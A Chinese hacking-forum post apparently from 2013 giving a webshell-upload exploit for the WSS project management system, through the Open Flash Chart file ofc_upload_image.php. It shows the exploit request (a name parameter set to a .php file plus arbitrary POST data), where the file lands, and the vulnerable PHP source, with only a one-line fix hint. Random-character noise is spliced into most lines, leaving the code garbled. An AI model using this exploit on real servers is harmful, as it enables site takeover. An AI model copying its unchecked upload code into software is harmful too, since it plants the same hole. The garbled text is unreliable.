找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2255|回复: 0
打印 上一主题 下一主题

WSS项目管理系统Post get shell

[复制链接]
跳转到指定楼层
楼主
发表于 2013-2-23 12:38:58 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
POST 数据漏洞文件执行任意后缀文件保存7 L1 N8 g! U$ M: }+ u8 `# P/ O
漏洞文件/chart/php-ofc-library/ofc_upload_image.php
. X+ d* I( t- w$ R
" o1 F1 S! Q+ m: R利用:
3 j4 A- N9 w+ m6 f/chart/php-ofc-library/ofc_upload_image.php?name=hfy.php hfy.php 文件名
0 v: c8 Q* H& w5 T) i/ u
; t3 i* A+ V0 j$ Q3 gPost任意数据# _' Z  I3 I8 n8 ~
保存位置http://localhost/chart/tmp-upload-images/hfy.php
/ ?/ n% [- s% x
) _+ E0 {+ a  \' c7 s7 U3 V3 a  ?/ e+ O: \6 K$ H; H5 I1 ]
最新版wss漏洞文件,即使是收费版本也有的,在新浪商店部署的demo~
( \+ d# M  y" l6 w1 N' \
8 }+ J1 u. a1 Y9 x, g/ ~& t& v<?php8 L# p0 v  w7 H

/ h* I/ F' F1 A( W- }//
, _* }  _& _2 i7 s8 ]// In Open Flash Chart -> save_image debug mode, you1 u# S# a) O/ Y  J" V+ N' b
// will see the 'echo' text in a new window.
: w  n# u3 r, U: I//+ L& j2 c9 [4 G- w" v- [% @2 F/ |# N; A

# Y8 u) x% G, h  K0 B/*6 F, c4 g; u# i2 D
3 p/ ]8 M/ s" ]2 m4 o
print_r( $_GET );0 P7 B) a/ r# r0 t7 P
print_r( $_POST );& B2 v, q' T; Q  v$ n9 k% j
print_r( $_FILES );+ W2 v" ^5 A; E: s5 x

1 P, o( e1 t/ l3 b/ I; r/ `" vprint_r( $GLOBALS );3 C3 I1 J' I/ P9 x. M  ?
print_r( $GLOBALS["HTTP_RAW_POST_DATA"] );
; r+ s1 g; x2 T& O2 e& S( \1 ?) S" n" W8 c3 r
*/3 s5 g; ]" L0 c/ z
// default path for the image to be stored //
5 m& _! n" T) ^$default_path = '../tmp-upload-images/';9 w1 ]8 p" s" ]  _

: N1 z. i& r% l* Mif (!file_exists($default_path)) mkdir($default_path, 0777, true);
$ h# J$ F1 g! d8 u- D; L# [
) N: `$ G) h3 i* Y" F5 v5 d// full path to the saved image including filename //) ^6 @9 A+ X, S' ?6 q
$destination = $default_path . basename( $_GET[ 'name' ] );
  E" x2 ^; x$ d$ [3 p, H3 h4 ?. t
echo 'Saving your image to: '. $destination;/ ]- a; U. v0 Q0 r: d
// print_r( $_POST );
  \% {& z8 q# }/ i// print_r( $_SERVER );
! s6 g! a3 |; m; z% \// echo $HTTP_RAW_POST_DATA;2 f( a/ S8 l: \% M6 l
0 N* k1 ], k- P: ^
//
8 V1 H5 b2 U" c7 M7 _% M/ `. O' e// POST data is usually string data, but we are passing a RAW .png
5 ]* L8 b+ R8 `! `// so PHP is a bit confused and $_POST is empty. But it has saved; r& x# N4 \: ?+ }
// the raw bits into $HTTP_RAW_POST_DATA
3 @- O4 b) |) `/ t//$ N3 T- _6 A; D2 T
  e. Q1 J/ n- O: c4 W+ h
$jfh = fopen($destination, 'w') or die("can't open file");+ f/ ?( v0 H# t3 C' }3 M( j! b, u
fwrite($jfh, $HTTP_RAW_POST_DATA);' G# P- P' c# h7 ^2 Q( p# A
fclose($jfh);$ q( J0 D/ W  }: t+ ]

% k5 N6 E) m. H$ K! w//
6 i/ Q! a. q! S0 c1 ]// LOOK:
  e! z; n# D: S, x, s7 @//& j0 C4 u; J% ?9 Q5 J
exit();" p$ T7 ], N) N. M; [8 C
//
- G# }( m7 h; x# z6 f// PHP5:
7 p* ]6 A. z" C5 W  b( y6 S//
+ H- X! O% ]' z9 |/ @# b1 A. X$ X( ]8 C; f

  S$ v& z- l# ~5 X. {  P- F) h// default path for the image to be stored //
% C! q) {: T$ f' w, B! a4 y- f$default_path = 'tmp-upload-images/';
  q0 v$ I% C8 q; K
' K6 C4 ^; ^& k  yif (!file_exists($default_path)) mkdir($default_path, 0777, true);6 W( z! K, p- g
2 m) I# z% N* ~  o8 r
// full path to the saved image including filename //9 O! q6 V4 h: g% o2 V( {- J/ ]
$destination = $default_path . basename( $_FILES[ 'Filedata' ][ 'name' ] );
. {( c/ y2 o6 |5 t: H4 i  K& p' R/ N( ?: f( v. z, R: R5 ~
// move the image into the specified directory //" k0 u6 d& z9 T
if (move_uploaded_file($_FILES[ 'Filedata' ][ 'tmp_name' ], $destination)) {
4 ?+ n3 T% g% {0 Y$ r  S    echo "The file " . basename( $_FILES[ 'Filedata' ][ 'name' ] ) . " has been uploaded;";  P8 _4 f! W1 \8 A
} else {
( B, l9 s+ q& s& q' d    echo "FILE UPLOAD FAILED";
$ w8 N& s2 g0 W}
; x. [. N9 _, ~1 z9 A8 r0 y, ~4 ^7 H: x- K8 G

# p" o1 g9 o) U  ~; ^- J: T?>
4 h; W' |6 |9 s7 P) y' N9 J* J. A, W. s8 d

2 w/ N  S! f- U4 e; f7 u9 h2 d, x9 A( t, i/ T- a+ c, z9 C0 m

! u, [" s# k$ ]+ O# r4 f  k8 G( b/ q0 m/ d
- E5 s6 U. X- P/ e- d1 r4 v
修复方案: % R3 k$ |# a8 ?6 k" S
这个漏洞文件就是个杯具,怎么破,加权限验证,后缀等验证~,自己搞
8 \. a7 g3 m& M; a% L) Y. q
; E- |8 F2 T- Z1 I) b4 z) ?3 l, W0 y8 u& p. W( Z$ R
) r: p- K- |& m9 H7 L; l

5 v* V% C; I5 Z# h/ e  Q+ g

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?立即注册

x
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表